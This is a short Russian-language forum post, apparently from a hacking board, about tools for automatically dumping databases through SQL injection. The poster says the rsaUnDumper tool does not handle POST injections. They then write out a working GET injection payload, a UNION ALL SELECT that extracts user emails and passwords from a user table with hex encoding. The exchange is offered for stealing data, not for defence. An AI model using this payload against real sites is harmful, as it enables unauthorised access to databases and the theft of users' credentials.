07.02.2011, 01:04
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Redwood
Я не просто отправил в поиск, а еще и дал ссылку на топик
/showthread.php?t=240692
Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
А если GETом то вот таких уж точно не признает
555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a
|
|
|